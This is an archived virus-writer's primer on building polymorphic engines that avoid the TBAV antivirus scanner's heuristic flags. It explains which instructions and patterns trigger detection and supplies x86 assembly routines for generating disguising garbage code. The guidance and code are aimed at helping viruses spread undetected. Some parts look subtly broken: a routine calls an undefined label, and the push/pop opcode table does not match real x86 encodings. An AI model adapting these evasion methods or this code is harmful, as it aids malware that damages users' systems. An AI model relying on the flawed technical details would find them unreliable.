💾 Archived View for spam.works › mirrors › textfiles › virus › polyflag.txt captured on 2023-06-16 at 21:03:52.

View Raw

More Information

-=-=-=-=-=-=-

 A Humble PolyMorphic Engine Primer by Absolute Overlord

 Foreward
 Since I've done a tremendous amount of research into avoiding flags
 with a polymorphic engine I've decided to document my research and
 present it for the benefit of others persuing the same.
 The benefits of using a polymorphic engine are excellent provided
 your engine achieves the requisite level of 'cleanliness' as far
 as heuristical flags go. The majority of polymorphic viruses have
 been stopped dead in their tracks due to the absurd level of flags
 they have been known to cause. If all of a sudden programs you knew
 which didn't have any flags scan as:

 G  Garbage instructions.  Contains code that seems to have no purpose
    other than encryption or avoiding recognition by virus scanners.
 @  Encountered instructions which are not likely to be generated by
    an assembler, but by some code generator like a polymorphic virus.
 1  Found instructions which require a 80186 processor or above.
 #  Found a code decryption routine or debugger trap.  This is common
    for viruses but also for some copy-protected software.
    

 Then you know you have a virus. Of course if your virus does things
 like scramble the keyboard buffer or print 'FUCK YOU' on the screen
 every ten seconds none of this discussion is really going to be worth
 your while. ;)



 First, the good news. Web and Avp *suck* next to tbav, and frankly
 the only scanner to use in your test bed is TBAV.
 Now the bad news. TBAV is damn good at catching all kinds of garbage
 code and finding decryption loops.
 The main thing to know here is that 1 flag is bad but 2 spells a
 catastrophe. This is because if tbav finds 2 flags on a file while
 scanning with high heuristics it will pop up the ubiquitious red
 warning window and summarily decide the file is infected.


 First, the decryption loop.

 In even the best polymorphic engines I've seen tbav finds the decryptor
 loop 5 times out of 10. It's hard to state the exact reason this is
 but it evens finds the decryptor loop in Rhincewind's Rhince engine
 droppers. This is peculiar because Rhince uses a very slick method
 of inserting a number of mov [memlocation], opcode instructions.
 The decryptor is actually laid down at the end of the 'header' while
 the header is executing. A fantastic idea, but nevertheless one that fails
 to elude tbav. Dark Slayer uses the method of xor [si,di,bp or bx], seed
 but tbav will catch this as well about 50% of the time.
 I hypothesized that if I spread the individual instructions for the
 decryptor loop over a number of subroutines that formed the actual
 loop tbav would fail to find it. I was right. So this is the method
 I use now in S.H.I.T. Of course, eventually tbav will be able to detect
 even this as well. I think tbav tries to keep track of memory pointed
 to by the index registers and watches for successive memory location
 changes. Hard to tell. One thing is certain though. A polymorphic
 engine must make a good show of attempting to hide the decryptor
 or the whole point is lost. You certainly can't have 50 files
 suddenly flagging as having a decryptor that didn't flag so before.


 Second, the dreaded @ polymorph engine flag.

 This one is not so hard to pin down. Almost all single byte opcodes
 like DAA, AAD, LOCK and other oddities you would rarely use in a
 program will trigger it. Addressing modes like mov dx,[bp+di+3425h]
 will trigger it. Lots of adc's, sub's ,cmp's, dec's and inc's will
 trigger it. Register operations involving bp, di, si,and sp will
 move you towards a trigger (but not gaurantee one).

 Any incidence of an opcode like mov al,ah where the direction bit
 is set will trigger the @ flag. Due to the way the opcode bit fields
 where designated there is a set of 'mirror' opcodes that perform
 the same function but with the register fields reversed and the direction
 bit set instead of clear (see appendix A). The same holds true for the xchg
 group of instructions.

 I believe that tbav uses a combination of a mathematical approach to counting
 the incidence of opcodes and addressing modes and computing the statistical
 likelihood of their occurrences as well as looking for specific opcodes
 and opcode sequences. This is a good reason that code produced by engines
 like PSE,MIME,MTE,TPE,PME,DSCE,DSME and VICE will give lots and lots of
 flags. If we count the incidence of each opcode and then do a frequency
 analysis on them we can come up with a fairly decent picture of your average
 program versus the kind of garbage produced by most poly engines.

 To be honest, it seems the only opcodes you can get away with and still
 gaurentee no @ flag is mov's, xchg's and push/pop pairs.
 That leaves the entire slew of mathematical and logical instructions
 to be re-explored however. That also leaves the standard flow control (CMP/JZ)
 pairs. I tested one version of shit that was getting 0 flags by adding
 cmp/jz/jnz/jo etc random flow control and started getting flags.
 Hard to pin down the cause here.

 Which leads us to the issue of the G garbage flag.
 Tbav is fairly intelligent and will flag G on almost any sequence of
 instructions that look like garbage to the naked eye so you really have
 to avoid producing code that looks like utter nonsense. The majority
 of actual program code consists of

 1 moves to registers from memory (setup)
 2 moves to registers of immediate values
 3 moves to memory of registers or immediate values
 4 moves to registers of registers
 5 pushes and pops to move registers to other registers
 6 occasional interupts to various system services
 7 compares with branches
 8 logical instructions like and,or,ror,sal etc
 9 mathemetical instructions like add,sub (pretty rare actually)

 I think that item number 6 needs more looking into.
 If I start debugging and see 200 bytes go by without a single Int21
 or Int10 or *SOMETHING* I think I would be pretty suspicious.
 I bet TBAV assumes the same here.
 Basically,if the code looks completely absurd with debug then I'm
 100% positive tbav will flag it as something as well.

 The U undocumented interupt flag.

 There's no denying the fact that TBAV has a flaw in it. It will sometimes
 produce this flag even when there are no such Int's in the tested code.
 Either that or there is a slim (but intentional?) random chance that
 mov ax,4C00h Int 21h will be flagged as undocumented.
 Maybe Franz wants an extra margin of safety.?:)

 The J suspicious jump construct flag.

 Programs like SMEG and others that overindulge in random flow control
 will cause this. Pare down the level of random flow control. The main
 thing I have noticed is that in most engines there is a total lack
 of control in the 'randomocity' of the code generated. You have to
 control it. Make it far less random. Make it look much more like
 the genuine article. (Speaking of which, I'm sure I'm not the first person
 to think of 'code theiving'. Actually going out and trying to find some
 chunk of code in the host or something to plunk down as our new entry
 header. I wonder if this could be done..)
 You might be better off avoiding random flow control entirely and
 lightening up your engine a bit in the process.

 The R Terminate and stay resident flag.

 This technically shouldn't be a flag any polymorphic engine should have
 to worry about but alas, Franz has an itchy trigger finger.
 You may occasionally see this if you have the instruction

 mov [si],bx

 anywhere in your code. Actually, this brings us to the point of the 'known
 flags' triggers. Here is a partial list:

 cmp ah,4Bh   ; program infects on execution.

 cmp ah,11h   ;stealth virus flag
 cmp ah,12h   ;ditto
 cmp ah,42h   ;ditto
 cmp ah,43h   ;ditto

 mov ah,40h   ;program may be capable of infecting a file.

 Int 27h      ;tsr ;)

 mov ah,37h   ;tsr
 .....
 int 21h

============================================================================
Appendix A

; I have taken the liberty of assembling some routines that use the bit
; field patterns of opcodes to produce opcodes of a limited type each
; These may help you in creating your own variants.
; The actual engine must still create the framework that is padded out
; with the 'filler'. The following routines total 299 bytes including
; random number generators and local variables.
; they assume ds:di is the destination for the garbage opcodes
; and use destroy the contents of ax and bx

padit:
; lay down between 2 and 5 filler opcodes selected from the available
; types
                call get_rnd   ;get a random number for fill count
                and ax,03h     ;
                inc ax
                inc ax         ;min 2,max 5 opcodes
do_cx_rnd:      push ax
new_fill:       mov ax, (end_op_table-op_table)/2 ;select the type of
                call rand_in_range                ;filler
                cmp ax,word ptr [last_fill_type]
                jz new_fill      ;avoid same types in a row
                mov word ptr [last_fill_type],ax
                add ax,ax
                mov bx,ax
                call word ptr cs:[op_table+bx]
                pop ax
                dec ax
                jnz do_cx_rnd
                ret

; 38 bytes

op_table: dw offset move_with_mem     ;here we can weight the frequencies
          dw offset move_with_reg     ;a bit by inserting a subroutine
          dw offset move_imm          ;more than once
          dw offset reg_exchange
          dw offset do_push_pop
end_op_table:
last_fill_type dw 0
shit_range dw 0
shit_range_base dw 0
; 16 bytes

move_imm:
; makes an opcode of type mov reg,immediate value
; either 8 or 16 bit value
; but never ax or al or sp,di,si or bp

      call get_rnd
      and al,0Fh  ;get a reggie
      or al,0B0h   ;make it a mov reg,
      test al,00001000b
      jz is_8bit_mov
      and al,11111011b ; make it ax,bx cx or dx
      mov ah,al
      and ah,03h
      jz move_imm           ;not ax or al!
      stosb
      call rand_16
      stosw
      ret
is_8bit_mov:
      mov bh,al   ;
      and bh,07h  ; is al?
      jz move_imm ; yeah bomb
      stosb
      call get_rnd
      stosb
      ret

;37 bytes


move_with_mem:
; ok now we get busy with type mov reg,[mem] and type mov [mem],reg
; but never move ax,[mem] or mov al,[mem]
; or any moves involving bp,sp,di or si
; note:
; shit_range_base is a pointer to mem ok to mess with in the new
; host + virus combo. This would be somewhere in the current segment
; after the virus code and below the reserved stack area.
; shit_range is typically (65536 - stack_allocation) - shit_range_base
; shit_range_base is typically host_size+virus_size+safety_margin

    call rand_16
    and ax,0011100000000011b  ;preserve reggie,from/to mem and 8/16 bit
    or  ax,0000011010001000b  ;or it with addr mode imm 16 and make it mov
    test al,00000001b
    jnz is_16bitter
    cmp ah,00000110b       ;reggie = al?
    jz make_to_mem
    jmp all_clear_for_mem
is_16bitter:
    and ah,00011110b        ;make it ax,bx,cx or dx
    cmp ah,00000110b        ;is reggie = ax?
    jnz all_clear_for_mem   ;yes, make it to mem
make_to_mem:
    and al,11111101b       ; make it to mem
all_clear_for_mem:
    stosw
    mov ax,[shit_range] ;this will be zero if there not enuff room to define
    or ax,ax
    jnz shit_ok
    dec di
    dec di
    ret              ;there is no shit range defined so abort!
shit_ok: xor ah,ah
    call rand_in_range
    add ax,[shit_range_base]
    stosw
    ret
; 54 bytes


move_with_reg:
; ok now we knock boots with mov reg,reg's
; but never to al or ax.

    call rand_16
    and ax,0011111100000001b  ;preserve reggies and 8/16 bit
    or  ax,1100000010001010b  ;or it with addr mode and make it mov
reg_test:
    test al,1
    jz is_8bit_move_with_reg
    and ah,11011011b         ;make source and dest = ax,bx,cx,dx
is_8bit_move_with_reg:
    mov bl,ah
    and bl,00111000b
    jz move_with_reg       ;no mov ax, 's please
    mov bh,ah              ;let's see if 2 reggies are same reggies.
    sal bh,1
    sal bh,1
    sal bh,1
    and bh,00111000b
    cmp bh,bl              ;reg,reg are same?
    jz move_with_reg       ;dho!
    stosw
    ret

; 39 bytes

reg_exchange:
; modify a mov reg,reg into an xchg reg,reg

  call move_with_reg  ;make a mov reg,reg
  dec di              ;but then remove it
  dec di         ;and take advantage of the fact the opcode is still in ax
  test al,1b        ;was a 16 bit type?
  jnz reg_exchange  ;yeah go for an 8 bitter
  mov bh,ah
  and bh,07h         ;is one of reggies ax?
  jz reg_exchange    ;yah so bomb
  mov al,10000110b   ;else make it xchg ah,dl etc.
  stosw
  ret

; 19 bytes

; we can get slick and use the above routines to create a mov instruction
; and then modify it into a math or cmp preserving the pre assembled
; addressing mode

make_math_with_mem:
  call mov_with_mem
  push di
  sub di,4
  mov al,byte ptr [di]
  and al,00000011b     ;preserve the pertinent address mode info
  push ax
  call get_rnd
  and al,00111000b     ;weed out a new opcode like sub,add etc..
  pop bx
  or al,bl               ;set the address mode bits
  mov byte ptr  [di],al  ;a new instruction is born!
  pop di                ;restore our pointer
  ret

; 26 bytes :)


do_push_pop:
; we don't have to watch our stack if we pair up pushes with pops
; so I slapped together this peice of shoddy work to add em.

        mov ax,(end_bytes_2-bytes_2)/2
        call rand_in_range
        add ax,ax
        mov bx,ax
        mov ax,word ptr [bytes_2+bx]
        stosw
        ret
bytes_2:
        push ax
        pop dx
        push ax
        pop bx
        push ax
        pop cx
        push bx
        pop dx
        push bx
        pop cx
        push cx
        pop bx
        push cx
        pop dx
end_bytes_2:
; 31 bytes

; the following random number gen routines where originated by rhincewind
; his random in range routine is great :)


rand_in_range:  push bx      ;returns a random num between 0 and entry ax
                push dx
                xchg ax,bx
                call get_rnd
                xor dx,dx
                div bx
                xchg ax,dx  ;dx=remainder
                pop dx
                pop bx
                ret
get_rnd:
; simple timer based random numbers but with a twist using xor of last one
; also originated by RhinceWind.
                in ax,40h
                xor ax, 0FFFFh
                org $-2
Randomize       dw ?
                mov [Randomize],ax
                ret

rand_16:
; a small variation to compensate for lack of randomocity in the
; high byte of 16 bit result returned by get_rnd
                call get_rnd
                mov bl,al
                call get_rnd
                mov ah,bl
                ret
;39




============================================================================
Appendix B

 Instruction Bitfeild Layouts

 Section 1 - 8 basic arithmetic intructions bit feild layout.
 Covers reg,mem  mem,reg and reg,reg but not immediates.


first byte                    second byte - register and address mode
       op                     mode dest  source
      /   \                   / \ /  \  /  \
  7 6 5 4 3 2 1 0             7 6 5 4 3 2 1 0
  0 0 |     0 | |             |   |     |
      |       | 1 = 16 bit    |   |     0 0 0 = [BX+SI+] if index mode
      |       | 0 = 8 bit     |   |     0 0 1 = [BX+DI+]
      |       1 = to reg      |   |     0 1 0 = [BP+SI+]
      |       0 = to mem      |   |     0 1 1 = [BP+DI+]
      |                       |   |     1 0 0 = [SI+]
      0 0 0 = add             |   |     1 0 1 = [DI+]
      0 0 1 = or              |   |     1 1 0 = [BP+]
      0 1 0 = adc             |   |     1 1 1 = [BX+]
      0 1 1 = sbb             |   0 0 0 = AX (al) register map
      1 0 0 = and             |   0 0 1 = CX (cl)
      1 0 1 = sub             |   0 1 0 = DX (dl)
      1 1 0 = xor             |   0 1 1 = BX (bl)
      1 1 1 = cmp             |   1 0 0 = SP (ah)
                              |   1 0 1 = BP (ch)
                              |   1 1 0 = SI (dh)
                              |   1 1 1 = DI (bh)
                              0 0 - register index only (unless bp)
                              If index reg is [bp+] then
                              0 0 = [1000h] 16 bit long only
                              (there is no [bp] only mode)
                              0 1 - immediate is 8 bit short adrress
                              1 0 - immediate is 16 bit long address
                              1 1 register to register
                                  source bits are second register using
                                  same encoding as destination reg above.


; Note : If bit 2 of first byte is 1 then it is type immediate value to
; register : bit 1 (direction bit) will always be a
; zero, bit 0 specifies immediate to an 8 bit register with a single
; byte operand (0) or immediate to an 8 bit register with a word operand(1).
; byte 2 has the destination register using the above encoding only
; moved to the low 3 bits with bits 3,4,5 clear and bits 6 and 7 always
; set.
; operations of type add [memlocation], immediate are in the special
; 'FF' family to be described later.


 Section 2 ,the 'HiBit' series. Note bits 1 and 0 of first byte
 and second byte (addressing mode) is the same as above.

    first byte
      op                           second byte - same as above
     /   \
 7 6 5 4 3 2 1 0
 1 0 |     0 x x - see above
     0 0 0 - Mov
     0 0 1 -
     0 1 0 -
     0 1 1 -
     1 0 0 -
     1 0 1 -
     1 1 0 -
     1 1 1 -







 Section 3 - The '40' series Pushes and pops

 7 6 5 4 3 2 1 0
 0 0 0 1 x x x x
         | |
         | 0 0 0 Ax
         | 0 0 1 bx
         | 0 1 0 cx
         | 0 1 1 dx
         | 1 0 0 bp
         | 1 0 1 sp
         | 1 1 0 si
         | 1 1 1 di
         |
         0 Push
         1 Pop